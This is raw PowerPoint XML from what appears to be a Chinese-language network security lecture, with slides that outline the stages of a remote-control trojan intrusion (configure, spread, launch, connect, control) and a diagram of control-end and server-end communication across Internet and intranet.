      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39917436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3138" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>远程控制木马的运行步骤</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1243139" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>远程控制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>木马进行网络入侵的过程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>配置木马</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>传播木马</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>启动木马 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>建立连接 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>远程控制</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3260341" y="2411413"/>
            <a:ext cx="5683634" cy="3257550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3023026669"/>
      </p:ext>
    </p:extLst>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243139">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1243139">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1243139">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124313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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>建立连接</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="187394" name="Group 2"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="342900" y="1485900"/>
            <a:ext cx="8391525" cy="4410075"/>
            <a:chOff x="2782" y="5313"/>
            <a:chExt cx="7083" cy="3559"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="187395" name="Picture 3"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4273" y="6667"/>
              <a:ext cx="4629" cy="1313"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="187396" name="Group 4"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2782" y="6884"/>
              <a:ext cx="1492" cy="1545"/>
              <a:chOff x="854" y="2083"/>
              <a:chExt cx="847" cy="811"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="187397" name="Picture 5"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4" cstate="print"/>
              <a:srcRect/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1020" y="2083"/>
                <a:ext cx="635" cy="576"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="187398" name="Rectangle 6"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="854" y="2659"/>
                <a:ext cx="847" cy="235"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr vert="horz" wrap="square" lIns="77742" tIns="38872" rIns="77742" bIns="38872"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2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                    <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                  </a:rPr>
                  <a:t>木马控制端</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="187399" name="Group 7"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="8373" y="5698"/>
              <a:ext cx="1492" cy="1850"/>
              <a:chOff x="3893" y="1969"/>
              <a:chExt cx="847" cy="971"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="187400" name="Picture 8"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5" cstate="print"/>
              <a:srcRect/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4105" y="1969"/>
                <a:ext cx="534" cy="690"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="187401" name="Rectangle 9"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3893" y="2705"/>
                <a:ext cx="847" cy="235"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr vert="horz" wrap="square" lIns="77742" tIns="38872" rIns="77742" bIns="38872"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2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                    <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                  </a:rPr>
                  <a:t>木马服务端</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="187402" name="Picture 10"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4605" y="5933"/>
              <a:ext cx="783" cy="538"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="187403" name="Group 11"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="5683" y="5313"/>
              <a:ext cx="2632" cy="1571"/>
              <a:chOff x="2835" y="1531"/>
              <a:chExt cx="1495" cy="824"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="187404" name="Picture 12"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId7" cstate="print"/>
              <a:srcRect/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2835" y="1531"/>
                <a:ext cx="1495" cy="824"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="187405" name="Rectangle 13"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3288" y="1857"/>
                <a:ext cx="626" cy="235"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr vert="horz" wrap="square" lIns="77742" tIns="38872" rIns="77742" bIns="38872"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00"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                    <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                  </a:rPr>
                  <a:t>Internet</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="187406" name="Group 14"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2986" y="5951"/>
              <a:ext cx="1306" cy="661"/>
              <a:chOff x="882" y="1866"/>
              <a:chExt cx="742" cy="347"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="187407" name="Picture 15"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId7" cstate="print"/>
              <a:srcRect/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="882" y="1866"/>
                <a:ext cx="742" cy="347"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="187408" name="Rectangle 16"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="929" y="1933"/>
                <a:ext cx="634" cy="235"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr vert="horz" wrap="square" lIns="77742" tIns="38872" rIns="77742" bIns="38872"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rgbClr val="000000"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                    <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                  </a:rPr>
                  <a:t>Intranet</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="187409" name="Line 17"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3604" y="6533"/>
              <a:ext cx="0" cy="411"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="97178" tIns="48590" rIns="97178" bIns="48590" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="187410" name="Line 18"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4220" y="6252"/>
              <a:ext cx="402" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="97178" tIns="48590" rIns="97178" bIns="48590" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="187411" name="Line 19"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5359" y="6252"/>
              <a:ext cx="336" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="97178" tIns="48590" rIns="97178" bIns="48590" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="187412" name="Line 20"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8144" y="6080"/>
              <a:ext cx="616" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="97178" tIns="48590" rIns="97178" bIns="48590" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="187413" name="Rectangle 21"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5815" y="6884"/>
              <a:ext cx="980" cy="448"/>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sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>控制流</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="187414" name="Line 22"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4273" y="6612"/>
              <a:ext cx="4629" cy="62"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="97178" tIns="48590" rIns="97178" bIns="48590" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="187415" name="Line 23"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4273" y="6666"/>
              <a:ext cx="0" cy="961"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="97178" tIns="48590" rIns="97178" bIns="48590" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="187416" name="Text Box 24"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5150" y="8566"/>
              <a:ext cx="2994" cy="306"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="9525" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>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800" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
                  <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>木马的常规通信方式</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="zh-CN" sz="2800" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14615327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AutoShape 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5724525" y="2860675"/>
            <a:ext cx="142875" cy="1655763"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
